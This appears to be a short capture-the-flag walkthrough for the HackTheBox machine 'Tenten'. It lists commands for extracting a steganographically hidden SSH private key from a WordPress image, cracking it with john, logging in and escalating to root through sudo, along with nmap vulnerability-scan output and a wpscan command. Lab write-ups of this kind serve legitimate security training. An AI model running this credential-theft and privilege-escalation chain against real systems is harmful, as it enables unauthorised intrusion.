Commands:
$ wget http://10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg
$ steghide extract -sf HackerAccessGranted.jpg
Enter passphrase:
wrote extracted data to "id_rsa".
$ python sshng2john.py id_rsa > id_rsa.encrypted
$ john id_rsa.encrypted --wordlist=/usr/share/wordlists/rockyou.txt
$ ssh -i id_rsa takis@10.10.10.10
takis@tenten:~$ sudo -l
takis@tenten:~$ sudo /bin/fuckin su
root@kali:~/Desktop/HTB_VIP# nmap -script=vuln 10.10.10.10
Starting Nmap 7.60 ( https://nmap.org ) at 2018-08-25 22:52 PKT
Nmap scan report for 10.10.10.10
Host is up (0.13s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.10
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.10.10:80/
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/#icon-bars
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/#icon-close
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/index.php/category/uncategorized/
| Form id: search-form-5b8197994e6e2
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/#icon-search
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/wp-login.php
| Form id: loginform
| Form action: http://10.10.10.10/wp-login.php
|
| Path: http://10.10.10.10/index.php/jobs/
| Form id:
| Form action: http://10.10.10.10/index.php/jobs/apply/
|
| Path: http://10.10.10.10/#content
| Form id: search-form-5b81979606f84
| Form action: http://10.10.10.10/
|
| Path: http://10.10.10.10/index.php/2017/04/
| Form id: search-form-5b81979f27fb2
|_ Form action: http://10.10.10.10/
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /wp-login.php: Possible admin folder
| /wp-login.php: Wordpress login page.
|_ /readme.html: WordPress version 4.7
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: takis
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
Nmap done: 1 IP address (1 host up) scanned in 360.64 seconds
root@kali:~/Desktop/HTB_VIP#
$ wpscan -u 10.10.10.10 -f -e -r